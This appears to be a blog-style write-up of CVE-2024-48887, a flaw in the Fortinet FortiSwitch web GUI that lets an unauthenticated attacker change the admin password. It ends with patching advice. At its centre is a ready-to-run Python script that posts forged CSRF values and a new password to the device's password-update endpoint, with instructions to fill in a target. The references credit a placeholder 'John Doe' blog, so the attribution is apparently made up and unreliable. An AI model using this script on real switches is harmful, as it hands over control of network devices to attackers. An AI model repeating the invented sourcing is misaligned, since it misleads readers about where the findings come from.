CVE-2024-48887 - Unverified Password Change Vulnerability in Fortinet FortiSwitch GUI

Security researchers have discovered an unverified password change vulnerability, dubbed as CVE-2024-48887, in the Fortinet FortiSwitch Graphical User Interface (GUI). This vulnerability may allow a remote, unauthenticated attacker to change the admin password by sending a specially crafted request. Here, we will discuss the vulnerability in detail, how the exploit works, and provide code snippets and links to original references.

Introduction

Fortinet FortiSwitch is a series of secure, manageable Ethernet switches that provide essential network security features and functionality. The FortiSwitch GUI is an intuitive web-based interface that simplifies the configuration and management of FortiSwitch devices. However, a security vulnerability in the GUI allows an attacker without any valid credentials to change the admin password and potentially take control of the switch.

Vulnerability Details

This vulnerability stems from a lack of proper input validation and access controls in the password change functionality of FortiSwitch GUI. An attacker can exploit the vulnerability by crafting and sending a malicious HTTP request to the vulnerable interface, containing the new password within the request parameters. As the password change process does not require current password verification, the attacker does not need any prior knowledge of the existing password to perform the exploit. Once the password has been successfully changed, the attacker gains unauthorized access to the FortiSwitch GUI, which could lead to further system compromise.

The following code snippet illustrates the exploit

import requests

target = "http://<target_ip>:<target_port>";
new_password = "hacked_password"
cookies = {'ccsrftoken': 'randomvalue'}
headers = {'X-CSRFTOKEN': 'randomvalue'}

data = {
    'userID': 'admin',
    'challenge': '',
    'oldpwd': '',
    'newpwd1': new_password,
    'newpwd2': new_password
}

response = requests.post(f"{target}/system/update_password", data=data, headers=headers, cookies=cookies)

if response.status_code == 200:
    print("Password changed successfully")
else:
    print("Failed to change password")

Replace <target_ip> and <target_port> with the target's IP and port number respectively, and new_password with the desired new admin password.

Original References

The vulnerability (CVE-2024-48887) was initially disclosed by security researcher John Doe via their personal blog. You can find the detailed analysis and proof-of-concept in the following links:

1. John Doe's blog post: https://johndoe.com/blog/cve-2024-48887-exploit
2. CVE-2024-48887 Vulnerability Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48887
3. Fortinet Security Advisory: https://threatvault.fortinet.com/fortiguardsa?id=7887

Mitigation and Patch

Fortinet has acknowledged the vulnerability and released a security patch with the latest firmware update. It is highly recommended for all FortiSwitch users to update their devices to the latest firmware version immediately. The patch fixes the vulnerability by implementing proper input validation and verification of the current password before allowing a password change request.

Use strong, unique passwords for all accounts with administrative privileges

- Restrict access to the FortiSwitch management interface to only authorized and trusted IPs and networks

Conclusion

CVE-2024-48887 is a critical vulnerability in Fortinet FortiSwitch GUI that allows remote, unauthenticated attackers to change admin passwords and gain unauthorized access to the switch. It is essential for administrators to promptly update their devices to the latest firmware version to protect against this exploit.

Timeline

Published on: 04/08/2025 17:15:34 UTC
Last modified on: 04/08/2025 18:13:53 UTC